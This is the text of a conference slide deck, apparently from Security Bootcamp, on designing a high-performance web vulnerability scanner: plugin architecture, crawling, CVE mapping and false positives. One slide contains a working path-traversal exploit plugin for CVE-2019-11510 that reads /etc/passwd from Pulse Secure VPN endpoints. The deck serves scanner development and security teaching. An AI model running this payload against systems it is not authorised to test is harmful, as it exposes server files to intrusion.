Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view

Trung Nguyen
Building a high performance
Web Application Vulnerability Scanner

› @everping
› Founder & CEO at CyStack
› Security Researcher, Bug Hunter, Computer Engineer
› Discovered critical vulnerabilities and acknowledged by
Microsoft, IBM, D-LINK, HP, Delloite
Whoami

› What is a WAVS?
› Why do we need WAVS?
› Architecture and Design
› Challenges
Agenda

Web Application Vulnerability Scanners are
automated tools that scan web applications, normally
from the outside, to look for security vulnerabilities
such as Cross-site scripting, SQL Injection, Command
Injection, Path Traversal and insecure server
configuration

› Discover attack surfaces (URLs, headers, open
ports)
› Gather information about the target (OS, Web
frameworks, built-in technologies, sitemap)
› Detect non-business logic vulnerabilities (SQLi, XSS,
SSTi)
› Detect misconfigurations
For pentesters

› Get similar advantages as pentesters get
› See an overview of security risks in web applications
› Integrate findings into vulnerability management
› Save cost against basic security flaws
For businesses

Should we create our own
WAVS?

NO
Except you do it due to educational purposes or clear
commercial purposes

› User doesn’t like the way scanner X implements a feature
› User has free time
› User starts writing his own scanner and usually succeeds in implementing the one
feature he really needed
› The new web application scanner only works on a small subset of sites, since it doesn’t
know how to extract links other than the ones in tags, or can’t handle broken HTML, or is
too slow to be used on any site with more than a few hundred pages.
› The creator of the new tool maintains it for six months
› The project dies when the project lead finds more interesting things to do, finds a tool
that did what he needed, changes jobs, etc.
The usual timeline

Security testing in the wild
Discovery
Vulnerability
Analysis
Exploitation
Follow the tactical exploitation

Discovery
Vulnerability
Analysis
Exploitation
This is the process for discovering as much
background information about the target as
possible including, hosts, operating systems,
topology, etc.

Discovery
Vulnerability
Analysis
Exploitation
Vulnerability analysis is the process of
discovering flaws in systems and applications
which can be leveraged by an attacker.

Discovery
Vulnerability
Analysis
Exploitation
The exploitation focuses solely on establishing
access to a system or resource by bypassing
security restrictions.

› Scalability: Adding new vulnerability signatures
easily
› Stability: Taking up less RAM and CPU
› Reliability: Finding vulnerabilities with low false
positive
Requirements

The
Flow
Subdomain Findercs.com
news.cs.com
blog.cs.com
...
Port Scan
https://blog.cs.com:443
ftp://news.cs.com:21
https://news.cs.com:8443
...
Crawling & Fuzzing CPE and CVE Mapping Public exploits Testing
Vulnerability synthesis

Architecture
Core Plugins
Apply the plugin-based architecture
Core
› Manages the main flow
› Coordinates the processes, threads
› Provides APIs to resuse by plugins
Plugins
› Find flaws directly
› Get data from the core
› Share information gathered for other components/plugins via the core apis

Plugins
› Infrastructure: Gather all information about the target such as sitemap, headers, OS,
web framework, etc. It runs in a loop which the output of one discovery plugin is sent
as input to the next plugin
› Subdomain: Find all sub-domains from the root domain
› Audit: Take the output of discovery plugins and find vulnerabilities by fuzzing
› Attack: Try to exploit by using confirmed finding from audit plugins
› Other plugins: Output, mangle, evasion, grep, brute force

Architecture
User
Discovery
Audit
Output
Knowledge
Base

Crawling and Fuzzing
› The main component is a crawler
› The crawler gets the seed URL and finds all possible URLs of the target
Seed URL
Requester
Parse
Document
HTTP Response
URL Queue
The URL is not in the queue
URL
Pack
The URL is in the queue?
Fuzzable
Request

Knowledge Base
Pack
Debugger
Raw fuzz data
Fuzzable
Request
Mutant

› Normally use for finding 0-day vulnerabilities or common vulnerabilities (SQLi, XSS,
etc)
› Complex to implement a new plugin
› Take high rate of false positives

CPE and CVE mapping
› Detect the name and version of all possible technologies, frameworks of the target
› Convert findings to CPEs (Common Platform Enumeration) strings
› CPE is a structured naming scheme for information technology systems, software,
and packages.
› Find CVEs map with those CPEs
cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*
cpe:/o:linux:linux_kernel:2.6.0

CPE and CVE mapping
› Sometimes, converting name and version to CPE format is impossible
› Building your own threat intelligence or vulnerability DB is required

Public exploits tesing
› As know as blind testing
› Run known exploit code with your target. If the response matches the signature, the
target is vulnerable
› Detecting technologies is not really necessary

› Normally use for finding 1-day vulnerabilities, CVEs, known and public exploits for
specific applications or frameworks
› Easy to implement a new plugin
› Take low rate of false positives

class Cve201911510(AttackPlugin):
def __init__(self):
super().__init__()
self.path = '/dana-na'
self.payload = self.generate_payload()
def generate_payload(self, file_name=''):
if file_name == '':
file_name = '/etc/passwd'
payload = f'/../dana/html5acc/guacamole/../../../../../../..{fil
e_name}?/dana/html5acc/guacamole/'
return payload
def real_exploit(self, url):
resp = self.requester.get(url + self.payload, path_as_is=True)
if 'root:x:0' in resp.text:
return True
return False

Program languages
› The main language depends on the environment that the scanner is installed
› If the scanner is distributed as a desktop app, it should be written in low-level
language to protect against reverse engineering. Python is a bad choice.
› If the scanner is delivered as a service, the language is not a problem
› The core can be written in any program languages
› The plugins should be written in scripting languages such as python, LUA, or even
your own language for scalability

Code design
› Design pattern is very important if you’d like to scale up the scanner
class CoreStrategy(object):
def start(self):
try:
target = self._core.base_target
if not target.is_valid():
logger.error('The target is not valid')
return
if target.get_type() == TYPE_URL:
self.discover()
self.attack()
self.audit()
else:
self.discover()
self.attack()
except ScanMustStopException:
logger.error('[!] The scan will be finished now')
except:
logger.error()
Strategy Pattern

Code design
def real_exploit(self, url):
"""
This method MUST be implemented on every plugin.
:param url: url to test whether it can be exploited or not
:return: True if it is vulnerable. Otherwise, false.
"""
msg = 'Plugin is not implementing required method real_exploit'
raise NotImplementException(msg)
Abstract Pattern

Code design
def factory(module_name, *args):
"""
This function creates an instance of a class that's inside a module
with the same name.
Example :
>> cve_2015_4852 = factory( 'exploits.plugins.attack.cve_2015_4852' )
>> cve_2015_4852.get_name()
>> 'CVE-2015-4852'
:param module_name: Which plugin do you need?
:return: An instance.
"""
Factory Pattern

› The traditional crawler does not work with JS-based website
or single page application (Angular, VueJS, React)
Javascript crawling

› Available solutions: Using headless browsers to render JS
at the client side (Chronium, Firefox, PhantomJS, Splash, etc)
› Cons: Those engines take up a lot of computer resources
(RAM, CPU) and the rendering speed is slow
Javascript crawling

› Scanners normally take a lot of
› I/O resources since performing many requests to outside
› CPU since it has to be analyzed continuously
› RAM since using multi-thread design or forgetting to free
unnecessary memory
High overhead

› Solutions
› Optimize your code
› Should use low-level program languages
High overhead

https://blog.com/news/stuck-in-vietnam-a-stroke-of-luck-4193869.html
URL Rewrite
https://blog.com/posts/?id=4193869
A scanner can easily detect GET parameters as
But hardly to detect this one

https://blog.com/news/n1.html
Similarity URLs
Below URLs are similarity
But a scanner can crawl all of them, which leads to an increase in the
time scan

› Many web applications handle requests not in the way we
expect (e.g return status code 200 for not found pages)
› Delay in connections
› The web content includes vulnerability signatures
False positives

› Solution: Fix case by case
False positives

› Identify the appropriate form field (email, phone, name, city)
› Authenticate the target
› Crawl and fuzz APIs
› Deal with business logic vulnerabilities
Others

Thanks !
trungnh@cystack.net
@everping

Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Similar a Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view

Similar a Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view (20)

Más de Security Bootcamp

Más de Security Bootcamp (20)

Último

Último (20)

Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view